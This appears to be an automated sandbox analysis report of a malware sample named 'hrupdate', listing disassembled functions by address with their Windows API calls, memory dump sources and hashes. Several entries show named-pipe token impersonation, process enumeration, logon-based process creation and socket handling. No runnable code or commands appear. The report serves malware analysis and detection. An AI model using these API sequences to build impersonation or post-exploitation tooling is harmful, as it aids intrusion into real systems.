                                                                Function 04FC4AA2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: htonl$__vscwprintf_helper_malloc_memset_vswprintf_s_vwprintf
                                                                • String ID: 9
                                                                • API String ID: 1612592715-2366072709
                                                                • Opcode ID: b222dc4a6c3d1dc7cad6385109202360a019710b8b2d318321727920776c14a3
                                                                • Instruction ID: b80d537de38947cc2cfe6502ada3039380f889768db1b16e455b6a4c6f673ec2
                                                                • Opcode Fuzzy Hash: b222dc4a6c3d1dc7cad6385109202360a019710b8b2d318321727920776c14a3
                                                                • Instruction Fuzzy Hash: A011B972C00609BFEB12AFA4CD80AEE7BBDEF44258F10846AF954A7110E730A6168B50
                                                                Function 04FC6CA3 Relevance: 12.1, APIs: 8, Instructions: 105sleeppipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountErrorLastSleepTick$BuffersDisconnectFileFlushNamedPipe
                                                                • String ID:
                                                                • API String ID: 3377695601-0
                                                                • Opcode ID: b67a9876cb48b34c82fc347dcd885d26d351d216cd32b6629fce354187d9b321
                                                                • Instruction ID: 4a0c249075283f08dc5021bc2daa7508cf1dded6811ce9da3f1476b1dc395a3e
                                                                • Opcode Fuzzy Hash: b67a9876cb48b34c82fc347dcd885d26d351d216cd32b6629fce354187d9b321
                                                                • Instruction Fuzzy Hash: 55314FB2D00209AFEB11EFE4DD84ADEB7BDEF44314F1404A6E945E2141EA35BE45CBA1
                                                                Function 04FDEB12 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                • String ID:
                                                                • API String ID: 3886058894-0
                                                                • Opcode ID: 2dcd1c0d9137e8368c2b94111f2da4de1d422b23fb1f42fcf42c423265031aed
                                                                • Instruction ID: 123111f0a924681696a64d688f7a72b6a7206a0e73fbb5634a4d0420605ffc2a
                                                                • Opcode Fuzzy Hash: 2dcd1c0d9137e8368c2b94111f2da4de1d422b23fb1f42fcf42c423265031aed
                                                                • Instruction Fuzzy Hash: 1551CA71E00A05EFDB219F69CC4499EBB77EF80325F1C8629F4269A190E731BA53DB50
                                                                Function 04FC9B4C Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc$_rand
                                                                • String ID:
                                                                • API String ID: 2453798774-0
                                                                • Opcode ID: bd76e6eb33a331fff77b9f9b30d23c3d5c76f507eddf405f9d7436c7c4fbde50
                                                                • Instruction ID: 799cde5bcb7f4ba7ecb207a083d1dc92c84e78a1dbfabb7a867919e2717ceb2b
                                                                • Opcode Fuzzy Hash: bd76e6eb33a331fff77b9f9b30d23c3d5c76f507eddf405f9d7436c7c4fbde50
                                                                • Instruction Fuzzy Hash: 4E510771A0420ABFEB11DF789E54FFE7BA9DF46304F184099E884EB250DA71BA06C754
                                                                Function 04FD0BB6 Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __time64.LIBCMT ref: 04FD0BC8
                                                                  • Part of subcall function 04FDDC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04FD0BCD,00000000,00000080,00000000,00000000,?,?,?,04FC35CD,?,00000000,00000000), ref: 04FDDC30
                                                                  • Part of subcall function 04FDDC25: __aulldiv.LIBCMT ref: 04FDDC50
                                                                  • Part of subcall function 04FDDFA9: __getptd.LIBCMT ref: 04FDDFAE
                                                                • _malloc.LIBCMT ref: 04FD0C0F
                                                                • _memset.LIBCMT ref: 04FD0C1C
                                                                • _strtok.LIBCMT ref: 04FD0C36
                                                                • _strncpy.LIBCMT ref: 04FD0C6E
                                                                • _strncpy.LIBCMT ref: 04FD0C96
                                                                • _strtok.LIBCMT ref: 04FD0CA2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Time_strncpy_strtok$FileSystem__aulldiv__getptd__time64_malloc_memset
                                                                • String ID:
                                                                • API String ID: 3612108075-0
                                                                • Opcode ID: 1bc4c579327d68de2b10e2c594e4092247c8c89927ec089e94bf99a343215bcc
                                                                • Instruction ID: 26f044371840e1ec3d6d1454ad7173e14bf7d331b8382ed6b8b49ab1c6eb7b8a
                                                                • Opcode Fuzzy Hash: 1bc4c579327d68de2b10e2c594e4092247c8c89927ec089e94bf99a343215bcc
                                                                • Instruction Fuzzy Hash: E331C0B2600606AFEB149F74DC85FAB7BEEEB44259F084529F51AC7180EB31F54A8750
                                                                Function 04FD37B4 Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 04FD37E8
                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 04FD3806
                                                                • GetLastError.KERNEL32 ref: 04FD3810
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$OpenProcessToken
                                                                • String ID:
                                                                • API String ID: 2009710997-0
                                                                • Opcode ID: 44a1d56fcb97722d17a3c982c20d06ad0b28288f93a6f0ec7f2bf31e875b694f
                                                                • Instruction ID: a81a6a8acfe3a1085d74d03d2edbfbd191920f2feddf51f7851abee0d3683f71
                                                                • Opcode Fuzzy Hash: 44a1d56fcb97722d17a3c982c20d06ad0b28288f93a6f0ec7f2bf31e875b694f
                                                                • Instruction Fuzzy Hash: E62169B2A40305BFF7506FF1EC4DF5E3A6DEF00719F140034BB0594090EAB4A945D656
                                                                Function 04FC773A Relevance: 10.6, APIs: 7, Instructions: 59pipethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC7757
                                                                • GetLastError.KERNEL32 ref: 04FC776A
                                                                • ConnectNamedPipe.KERNEL32(00000000), ref: 04FC777E
                                                                • ImpersonateNamedPipeClient.ADVAPI32 ref: 04FC77A9
                                                                • GetCurrentThread.KERNEL32 ref: 04FC77BE
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 04FC77C5
                                                                • DisconnectNamedPipe.KERNEL32(9F7C69F4), ref: 04FC77D9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorImpersonateLastOpenToken_memset
                                                                • String ID:
                                                                • API String ID: 3598867581-0
                                                                • Opcode ID: 3b1c41e5b35e4c3e30ff6538123a19314dce94195a470724c29b27b8f252a5b7
                                                                • Instruction ID: 41baf0d732bc0930d788ca93b76e06194ce63a5e99529101ff68933000cce555
                                                                • Opcode Fuzzy Hash: 3b1c41e5b35e4c3e30ff6538123a19314dce94195a470724c29b27b8f252a5b7
                                                                • Instruction Fuzzy Hash: 0011307194020EAFFB106FA0BE85E6A3BADEF00749F440464F605D1091DB79AD55DFA1
                                                                Function 04FCB9E3 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCB9F1
                                                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 04FCBA15
                                                                • GetTickCount.KERNEL32 ref: 04FCBA4C
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCBA71
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTickioctlsocket
                                                                • String ID:
                                                                • API String ID: 3686034022-0
                                                                • Opcode ID: 392131720c1807619be52301bcaf7c93c2141d925671ba5d3cbdc6a6d49227d4
                                                                • Instruction ID: d241ea2ec8a437e8bd4569225cfd6e79758355311e9dba925580775bda35be92
                                                                • Opcode Fuzzy Hash: 392131720c1807619be52301bcaf7c93c2141d925671ba5d3cbdc6a6d49227d4
                                                                • Instruction Fuzzy Hash: 8A11A37695010DBFEB008FA0EC45BED7BACEF00765F008025FD45D6090DB78BA459B62
                                                                Function 00B02A10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00B02864,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B02A15
                                                                • _Mtx_unlock.MSVCP140(?,21DC2236,?,00000000,00000000,00B03E90,000000FF), ref: 00B02A66
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B02A74
                                                                • _Mtx_destroy.MSVCP140(?), ref: 00B02A7E
                                                                • _Cnd_destroy.MSVCP140(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B02A88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: C_error@std@@Cnd_destroyMtx_destroyMtx_unlockThrow_Xlength_error@std@@
                                                                • String ID: string too long
                                                                • API String ID: 1781926451-2556327735
                                                                • Opcode ID: 23d9c026dbc7f27fdbe2fde26df8a43885fd94b90bf731b408179e1a32e762bf
                                                                • Instruction ID: ed7728ae9ee092d48b68cf4b1d27c5d9ced92a105ede35fe05dcf57d477e3296
                                                                • Opcode Fuzzy Hash: 23d9c026dbc7f27fdbe2fde26df8a43885fd94b90bf731b408179e1a32e762bf
                                                                • Instruction Fuzzy Hash: B001B5B1900604EBD7109B54EC09B5B7BECEF05724F044579FB16E3790EF35A91887A5
                                                                Function 04FCE317 Relevance: 9.2, APIs: 6, Instructions: 161processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FCE339
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                • GetCurrentProcess.KERNEL32 ref: 04FCE384
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04FCE3B9
                                                                • Process32First.KERNEL32(00000000,?), ref: 04FCE3DB
                                                                  • Part of subcall function 04FC490F: htonl.WS2_32(00000000), ref: 04FC4915
                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 04FCE4BE
                                                                  • Part of subcall function 04FCE2AA: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 04FCE2B7
                                                                • ProcessIdToSessionId.KERNEL32(?,?,?,00000002,00000000), ref: 04FCE463
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
                                                                • String ID:
                                                                • API String ID: 3674674043-0
                                                                • Opcode ID: 8bf9552a858bc2318ec333ea176e3b882181de349b4bc6b8c341cd4bfbf53bff
                                                                • Instruction ID: 051c74c6bbce7fa945f00580f835c24a89fae0f852b8eb6f0527090b81aee91d
                                                                • Opcode Fuzzy Hash: 8bf9552a858bc2318ec333ea176e3b882181de349b4bc6b8c341cd4bfbf53bff
                                                                • Instruction Fuzzy Hash: A5516872D0421BAAFF21ABE09D45FEF7BBCDF04319F100059E608E2150EA35B6478B95
                                                                Function 04FC7C34 Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FCE2E8: GetCurrentProcess.KERNEL32(?,04FC9F55,?,04FC9FAD), ref: 04FCE2F4
                                                                • GetLastError.KERNEL32(?,?,?,04FCD106,00000000), ref: 04FC7C85
                                                                • _malloc.LIBCMT ref: 04FC7CF4
                                                                • _memset.LIBCMT ref: 04FC7D03
                                                                • _memset.LIBCMT ref: 04FC7D34
                                                                • GetLastError.KERNEL32 ref: 04FC7D62
                                                                • _memset.LIBCMT ref: 04FC7D77
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$ErrorLast$CurrentProcess_malloc
                                                                • String ID:
                                                                • API String ID: 2196066725-0
                                                                • Opcode ID: 22ead761a0adf3e1ec90099f95783a74f7fd12e851408f4e08a59c2c885fb25d
                                                                • Instruction ID: 0deca970a44cd2e487fdee136b644d4fd2670695552012fba5e1ad059028dbe8
                                                                • Opcode Fuzzy Hash: 22ead761a0adf3e1ec90099f95783a74f7fd12e851408f4e08a59c2c885fb25d
                                                                • Instruction Fuzzy Hash: 3D41AEA690010BBEFB10BBE5DD41EBFB3BDDF04658F040069FA44D1081EA76A952DB76
                                                                Function 04FC81A0 Relevance: 9.1, APIs: 6, Instructions: 130processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                • _memset.LIBCMT ref: 04FC8203
                                                                • GetStartupInfoA.KERNEL32(?), ref: 04FC821B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,04FC80F0,?,04FC7F09,04FC80F0,?,00000400), ref: 04FC664B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,04FC80F0,04FC7F09,?,04FC7F09,04FC80F0,?,00000400,?,?,?,?,04FC80F0), ref: 04FC6664
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 04FC8280
                                                                • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 04FC828A
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,04FC673C), ref: 04FC82B5
                                                                • GetLastError.KERNEL32 ref: 04FC82C4
                                                                  • Part of subcall function 04FC5B06: _vswprintf_s.LIBCMT ref: 04FC5B22
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                                                                • String ID:
                                                                • API String ID: 963358868-0
                                                                • Opcode ID: 6883fa6f1bb7b8e4aaf8631a50f509be6502bf58d81b26b3580abfd6ae75d0d8
                                                                • Instruction ID: 0955a9398cb6787150297bef45048d46671f2b003dfc8beae11cbeae05eb7dc8
                                                                • Opcode Fuzzy Hash: 6883fa6f1bb7b8e4aaf8631a50f509be6502bf58d81b26b3580abfd6ae75d0d8
                                                                • Instruction Fuzzy Hash: 32417F71D00209BBEF01AFE6DD48EDFBFB9EF88354F000019F608A6160D675A912DB61
                                                                Function 04FCB0B4 Relevance: 9.1, APIs: 6, Instructions: 113pipesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetNamedPipeInfo.KERNELBASE(?,00000000,?,00000000,00000000), ref: 04FCB11C
                                                                • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 04FCB133
                                                                • Sleep.KERNEL32(000001F4), ref: 04FCB189
                                                                • GetLastError.KERNEL32 ref: 04FCB1A2
                                                                • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 04FCB1BE
                                                                • GetLastError.KERNEL32 ref: 04FCB1C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$ErrorHandleLastState$InfoSleep
                                                                • String ID:
                                                                • API String ID: 1433407474-0
                                                                • Opcode ID: 72f99232b0af8308c0375ee75c2ea2643b7730e09894c0f6faa03cb214b390d6
                                                                • Instruction ID: 0d2d5ed15969a2379a864b95f2fe8e482253f36a9c731d2ed30f1c6cfa7825de
                                                                • Opcode Fuzzy Hash: 72f99232b0af8308c0375ee75c2ea2643b7730e09894c0f6faa03cb214b390d6
                                                                • Instruction Fuzzy Hash: ED315DB6D0420AEFEF10DF95ED869BEB7BDFF04305B10446EE501A2140E630BA86CB61
                                                                Function 04FCD2E4 Relevance: 9.1, APIs: 6, Instructions: 99threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 04FCD306
                                                                • UpdateProcThreadAttribute.KERNELBASE(00000000,00000000,00020000,?,00000004,00000000,00000000), ref: 04FCD334
                                                                • GetLastError.KERNEL32 ref: 04FCD33E
                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 04FCD376
                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 04FCD39E
                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 04FCD3BD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                                                • String ID:
                                                                • API String ID: 1014270282-0
                                                                • Opcode ID: e2ab51d6e893eb867d36b62f4a430cc24a3017c8b0463a31aa13dee092d7fe9e
                                                                • Instruction ID: cd63dd8f5f0aae6dab839801a1aa297a6bd2703851ab79abf0a1e8aae686561f
                                                                • Opcode Fuzzy Hash: e2ab51d6e893eb867d36b62f4a430cc24a3017c8b0463a31aa13dee092d7fe9e
                                                                • Instruction Fuzzy Hash: 6621B671A00316BBEF216F919D89F6F3F6DEF44750F140428F604DA180D675A902D6F1
                                                                Function 030D0A00 Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • accept.WS2_32(?,00000000,00000000), ref: 030D0A19
                                                                • recv.WS2_32(?,?,00000001,00000002), ref: 030D0A44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943261840.00000000030D0000.00000020.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_30d0000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: acceptrecv
                                                                • String ID:
                                                                • API String ID: 1078442044-0
                                                                • Opcode ID: 6e962035ec25cf2fbf3ac19bd4c125f38f0688742753830840ed1eef832f9458
                                                                • Instruction ID: 0714332ce589f33ef4ab701d4945f86aee8a779c80960117a6394586b619a233
                                                                • Opcode Fuzzy Hash: 6e962035ec25cf2fbf3ac19bd4c125f38f0688742753830840ed1eef832f9458
                                                                • Instruction Fuzzy Hash: 14314534B02308EFEB54DF58C845BAEBBF5EB44705F148488F90A9B280D775E989CB90
                                                                Function 04FCAB3D Relevance: 9.1, APIs: 6, Instructions: 80synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FCAB53
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • htonl.WS2_32(0B05BF21), ref: 04FCAB5D
                                                                • htonl.WS2_32(?), ref: 04FCAB67
                                                                • htonl.WS2_32(?), ref: 04FCAB72
                                                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,0B05BF21,00000001,00000000,00000000,04FC38C6), ref: 04FCABD1
                                                                • _memset.LIBCMT ref: 04FCAC02
                                                                  • Part of subcall function 04FCACE9: PeekNamedPipe.KERNEL32(00000000,00000000,00000004,04FC38C6,00000000,00000000,00000001,0B05BF21,00000000,0B05BF21,00000001,00000000,00000000,04FC38C6), ref: 04FCAD21
                                                                  • Part of subcall function 04FCACE9: htonl.WS2_32(?), ref: 04FCAD3F
                                                                  • Part of subcall function 04FCACE9: PeekNamedPipe.KERNEL32(00000008,?,00000004,00000004,00000008,00000000), ref: 04FCAD8E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: htonl$NamedPeekPipe$AllocateHeapObjectSingleWait_malloc_memset
                                                                • String ID:
                                                                • API String ID: 3572882391-0
                                                                • Opcode ID: 9165f39b7b214133181e4013514fd110f7224f61ea7dd2e3d477a942742c38b8
                                                                • Instruction ID: 8d13e9c19d7f83521859891e8e510b21439185e0653e3c7ed2613938606ebe46
                                                                • Opcode Fuzzy Hash: 9165f39b7b214133181e4013514fd110f7224f61ea7dd2e3d477a942742c38b8
                                                                • Instruction Fuzzy Hash: 7821D436D0071A9FE7316F749F40B7673AAEF40328714492EE9858A051F731F8878761
                                                                Function 04FC99C6 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC99D6
                                                                • _memset.LIBCMT ref: 04FC99E2
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9B9E
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9BA9
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BB5
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BC0
                                                                  • Part of subcall function 04FC9B4C: _rand.LIBCMT ref: 04FC9C1E
                                                                • __snprintf.LIBCMT ref: 04FC9A33
                                                                • __snprintf.LIBCMT ref: 04FC9A4B
                                                                • _memset.LIBCMT ref: 04FC9A6A
                                                                • _memset.LIBCMT ref: 04FC9A75
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$__snprintf_malloc$_rand
                                                                • String ID:
                                                                • API String ID: 1876596931-0
                                                                • Opcode ID: 3ab76693c85f7c8b0df6cf2efac4df2f23407f6b9f118f724d732a0b4dddca48
                                                                • Instruction ID: ac2b16a3b0e90cafd1600e9bc179e3babfc478eae3439853c8dffd9642f424d3
                                                                • Opcode Fuzzy Hash: 3ab76693c85f7c8b0df6cf2efac4df2f23407f6b9f118f724d732a0b4dddca48
                                                                • Instruction Fuzzy Hash: 5C216FB2900104FBEF14AF15CD81F5B7B69EF91708F544098EE006B296D6B1FE22CAA5
                                                                Function 04FD30BA Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FD30DE
                                                                • _memset.LIBCMT ref: 04FD30EC
                                                                • _memset.LIBCMT ref: 04FD30FA
                                                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 04FD3117
                                                                • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 04FD3146
                                                                • __snprintf.LIBCMT ref: 04FD3168
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$AccountInformationLookupToken__snprintf
                                                                • String ID:
                                                                • API String ID: 2009363630-0
                                                                • Opcode ID: 5bb153b6c4cdc11f372429f20f512a98ffc8b83a1de7cb42c0d9b4e93b7cdc18
                                                                • Instruction ID: 1182d0b6c440dfdf9565ecf573c1521b0eaf37a148c2352d4b47a6d89de8482c
                                                                • Opcode Fuzzy Hash: 5bb153b6c4cdc11f372429f20f512a98ffc8b83a1de7cb42c0d9b4e93b7cdc18
                                                                • Instruction Fuzzy Hash: 5621D3B2D0021DBEEB11DAD1DC84EEF77BCEF04748F0444BABA15E2111E674AB858B64
                                                                Function 04FC4261 Relevance: 7.7, APIs: 5, Instructions: 228COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_strncpy
                                                                • String ID:
                                                                • API String ID: 3537405232-0
                                                                • Opcode ID: 6e042d746d1d594135fbca47d0afb172622c9a4fa346a5672d678b3b06c6056f
                                                                • Instruction ID: 358e126f7e271cf1dd1b4a3b61438a545be2ad186dc29e01c2d9a3e73f6432d4
                                                                • Opcode Fuzzy Hash: 6e042d746d1d594135fbca47d0afb172622c9a4fa346a5672d678b3b06c6056f
                                                                • Instruction Fuzzy Hash: 1C81C372D0020BABEB10DBA4DE55FEE7BBCAF45318F14456AE514E7181E731F6068BA0
                                                                Function 04FC3A3A Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_strncpy
                                                                • String ID:
                                                                • API String ID: 3537405232-0
                                                                • Opcode ID: 8ac07fba0ed1d9553a2976d14e0964b8804b2fe4e3c87d8c7583f7bdfd4b0fd8
                                                                • Instruction ID: 81ee9bbbb82d93d48a80697974c83570eb188043eee0c89c6f3a0e6927ff264c
                                                                • Opcode Fuzzy Hash: 8ac07fba0ed1d9553a2976d14e0964b8804b2fe4e3c87d8c7583f7bdfd4b0fd8
